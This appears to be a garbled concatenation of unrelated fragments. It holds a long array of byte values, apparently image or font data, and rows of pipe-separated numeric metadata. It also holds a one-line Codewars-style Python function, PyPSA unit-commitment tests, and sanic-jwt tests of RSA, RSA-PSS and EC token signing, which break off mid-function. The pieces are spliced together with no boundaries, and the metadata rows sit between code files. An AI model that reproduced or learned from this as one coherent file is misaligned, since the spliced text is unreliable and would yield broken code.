0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0,
0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 248, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 248, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 4, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255,
255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 248,
0, 248, 0, 248, 0, 248, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 4,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 255, 224, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31,
0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0, 31, 0,
31, 0, 31, 0, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4,
0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 4, 0, 0, 0,
255, 224, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 224, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255,
255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255
]
| 81.387622
| 681
| 0.368827
| 14,519
| 49,972
| 1.268407
| 0.008127
| 1.234144
| 1.747774
| 2.201998
| 0.970732
| 0.961609
| 0.955962
| 0.943907
| 0.942659
| 0.939944
| 0
| 0.535571
| 0.338129
| 49,972
| 613
| 682
| 81.520392
| 0.021224
| 0.002241
| 0
| 0.721393
| 0
| 0
| 0.003169
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001658
| false
| 0
| 0
| 0
| 0.001658
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 13
|
9117274907d969e63ef9247fc06311ca67735559
| 95
|
py
|
Python
|
8 kyu/Will you make it?/Will you make it?.py
|
anthonyjatoba/codewars
|
76b0d66dd1ba76a4d136b658920cdf85fd5c4b06
|
[
"MIT"
] | null | null | null |
8 kyu/Will you make it?/Will you make it?.py
|
anthonyjatoba/codewars
|
76b0d66dd1ba76a4d136b658920cdf85fd5c4b06
|
[
"MIT"
] | null | null | null |
8 kyu/Will you make it?/Will you make it?.py
|
anthonyjatoba/codewars
|
76b0d66dd1ba76a4d136b658920cdf85fd5c4b06
|
[
"MIT"
] | null | null | null |
def zero_fuel(distance_to_pump, mpg, fuel_left):
return distance_to_pump <= mpg * fuel_left
| 47.5
| 48
| 0.778947
| 16
| 95
| 4.1875
| 0.5625
| 0.298507
| 0.41791
| 0.507463
| 0.746269
| 0.746269
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136842
| 95
| 2
| 49
| 47.5
| 0.817073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
911cd3f2e28400e227d18efacf83d7763fb0f4c9
| 3,129
|
py
|
Python
|
test/test_unit_commitment.py
|
hertelm/PyPSA
|
7c0561ebaa104a264ca6229c72c82370cbab66f5
|
[
"MIT"
] | 594
|
2017-10-20T19:02:15.000Z
|
2022-03-31T10:16:23.000Z
|
test/test_unit_commitment.py
|
hertelm/PyPSA
|
7c0561ebaa104a264ca6229c72c82370cbab66f5
|
[
"MIT"
] | 271
|
2017-10-23T15:12:03.000Z
|
2022-03-29T10:20:36.000Z
|
test/test_unit_commitment.py
|
hertelm/PyPSA
|
7c0561ebaa104a264ca6229c72c82370cbab66f5
|
[
"MIT"
] | 286
|
2017-10-23T09:45:15.000Z
|
2022-03-28T15:23:40.000Z
|
import pypsa
import pytest
import numpy as np
from numpy.testing import assert_array_almost_equal as equal
solver_name = "glpk"
@pytest.mark.parametrize("pyomo", [True, False])
def test_part_load(pyomo):
"""This test is based on
https://pypsa.org/examples/unit-commitment.html
and is not very comprehensive."""
nu = pypsa.Network()
snapshots = range(4)
nu.set_snapshots(snapshots)
nu.add("Bus", "bus")
nu.add("Generator", "coal",
bus="bus",
committable=True,
p_min_pu=0.3,
marginal_cost=20,
p_nom=10000)
nu.add("Generator", "gas",
bus="bus",
committable=True,
marginal_cost=70,
p_min_pu=0.1,
p_nom=1000)
nu.add("Load", "load",
bus="bus",
p_set=[4000,6000,5000,800])
nu.lopf(nu.snapshots, solver_name=solver_name, pyomo=pyomo)
expected_status = np.array([[1,1,1,0],[0,0,0,1]], dtype=float).T
equal(nu.generators_t.status.values, expected_status)
expected_dispatch = np.array([[4000,6000,5000,0],[0,0,0,800]], dtype=float).T
equal(nu.generators_t.p.values, expected_dispatch)
def test_minimum_up_time():
"""This test is based on
https://pypsa.org/examples/unit-commitment.html
and is not very comprehensive."""
nu = pypsa.Network()
snapshots = range(4)
nu.set_snapshots(snapshots)
nu.add("Bus", "bus")
nu.add("Generator", "coal",
bus="bus",
committable=True,
p_min_pu=0.3,
marginal_cost=20,
p_nom=10000)
nu.add("Generator", "gas",
bus="bus",
committable=True,
marginal_cost=70,
p_min_pu=0.1,
up_time_before=0,
min_up_time=3,
p_nom=1000)
nu.add("Load", "load",
bus="bus",
p_set=[4000,800,5000,3000])
nu.lopf(nu.snapshots,solver_name=solver_name)
expected_status = np.array([[1,0,1,1],[1,1,1,0]],dtype=float).T
equal(nu.generators_t.status.values,expected_status)
expected_dispatch = np.array([[3900,0,4900,3000],[100,800,100,0]],dtype=float).T
equal(nu.generators_t.p.values,expected_dispatch)
def test_minimum_down_time():
"""This test is based on
https://pypsa.org/examples/unit-commitment.html
and is not very comprehensive."""
nu = pypsa.Network()
nu.set_snapshots(range(4))
nu.add("Bus", "bus")
nu.add("Generator", "coal",
bus="bus",
committable=True,
p_min_pu=0.3,
marginal_cost=20,
min_down_time=2,
down_time_before=1,
p_nom=10000)
nu.add("Generator", "gas",
bus="bus",
committable=True,
marginal_cost=70,
p_min_pu=0.1,
p_nom=4000)
nu.add("Load", "load",
bus="bus",
p_set=[3000,800,3000,8000])
nu.lopf(nu.snapshots,solver_name=solver_name)
expected_status = np.array([[0,0,1,1],[1,1,0,0]],dtype=float).T
equal(nu.generators_t.status.values,expected_status)
expected_dispatch = np.array([[0,0,3000,8000],[3000,800,0,0]],dtype=float).T
equal(nu.generators_t.p.values,expected_dispatch)
| 22.510791
| 84
| 0.615213
| 463
| 3,129
| 3.99784
| 0.187905
| 0.032415
| 0.045381
| 0.068071
| 0.812534
| 0.792004
| 0.792004
| 0.792004
| 0.759589
| 0.758509
| 0
| 0.077879
| 0.228508
| 3,129
| 138
| 85
| 22.673913
| 0.688898
| 0.096516
| 0
| 0.702381
| 0
| 0
| 0.054937
| 0
| 0
| 0
| 0
| 0
| 0.011905
| 1
| 0.035714
| false
| 0
| 0.047619
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e66e05da8e5e13ce64ebeb5aab031022c2cd3f88
| 11,964
|
py
|
Python
|
tests/test_endpoints_jwt_cryptography.py
|
zwjat/sanic-jwt
|
3776cb8f76ccc15b4076d1e9e2f9347884bf25b7
|
[
"MIT"
] | null | null | null |
tests/test_endpoints_jwt_cryptography.py
|
zwjat/sanic-jwt
|
3776cb8f76ccc15b4076d1e9e2f9347884bf25b7
|
[
"MIT"
] | null | null | null |
tests/test_endpoints_jwt_cryptography.py
|
zwjat/sanic-jwt
|
3776cb8f76ccc15b4076d1e9e2f9347884bf25b7
|
[
"MIT"
] | null | null | null |
import binascii
import os
from pathlib import Path
from sanic import Sanic
from sanic.response import json
import pytest
from sanic_jwt import Configuration, exceptions, Initialize
from sanic_jwt.decorators import protected
@pytest.yield_fixture
def public_rsa_key():
yield Path(__file__).parent / "resources" / "rsa-test-public.pem"
@pytest.yield_fixture
def private_rsa_key():
yield Path(__file__).parent / "resources" / "rsa-test-key.pem"
@pytest.yield_fixture
def public_ec_key():
yield Path(__file__).parent / "resources" / "ec-test-public.pem"
@pytest.yield_fixture
def private_ec_key():
yield Path(__file__).parent / "resources" / "ec-test-key.pem"
async def authenticate(request, *args, **kwargs):
return {"user_id": 1}
def test_jwt_rsa_crypto_from_path_object(public_rsa_key, private_rsa_key):
app = Sanic()
sanicjwt = Initialize(
app,
authenticate=authenticate,
public_key=public_rsa_key,
private_key=private_rsa_key,
algorithm="RS256",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_rsapss_crypto_from_path_object(public_rsa_key, private_rsa_key):
app = Sanic()
sanicjwt = Initialize(
app,
authenticate=authenticate,
secret=public_rsa_key,
private_key=private_rsa_key,
algorithm="PS256",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_ec_crypto_from_path_object(public_ec_key, private_ec_key):
app = Sanic()
sanicjwt = Initialize(
app,
authenticate=authenticate,
public_key=public_ec_key,
private_key=private_ec_key,
algorithm="ES256",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_rsa_crypto_from_fullpath_as_str(public_rsa_key, private_rsa_key):
app = Sanic()
class MyConfig(Configuration):
secret = str(public_rsa_key)
private_key = str(private_rsa_key)
class MyInitialize(Initialize):
configuration_class = MyConfig
sanicjwt = MyInitialize(app, authenticate=authenticate, algorithm="RS384")
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_rsapss_crypto_from_fullpath_as_str(
public_rsa_key, private_rsa_key
):
app = Sanic()
class MyConfig(Configuration):
secret = str(public_rsa_key)
private_key = str(private_rsa_key)
algorithm = "PS384"
class MyInitialize(Initialize):
configuration_class = MyConfig
sanicjwt = MyInitialize(app, authenticate=authenticate)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_ec_crypto_from_fullpath_as_str(public_ec_key, private_ec_key):
app = Sanic()
class MyConfig(Configuration):
secret = str(public_ec_key)
private_key = str(private_ec_key)
class MyInitialize(Initialize):
configuration_class = MyConfig
sanicjwt = MyInitialize(app, authenticate=authenticate, algorithm="ES384")
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
_, response = app.test_client.get(
"/protected/",
headers={"Authorization": "Bearer {}".format(access_token)},
)
assert response.status == 200
assert response.json.get("protected") is True
def test_jwt_rsa_crypto_from_str(public_rsa_key, private_rsa_key):
app = Sanic()
sanicjwt = Initialize(
app,
authenticate=authenticate,
public_key=public_rsa_key.read_text(),
private_key=private_rsa_key.read_text(),
algorithm="RS512",
)
@app.route("/protected")
@protected()
async def protected_request(request):
return json({"protected": True})
_, response = app.test_client.post(
"/auth", json={"username": "foo", "password": "bar"}
)
assert response.status == 200
access_token = response.json.get(sanicjwt.config.access_token_name(), None)
assert access_token is not None
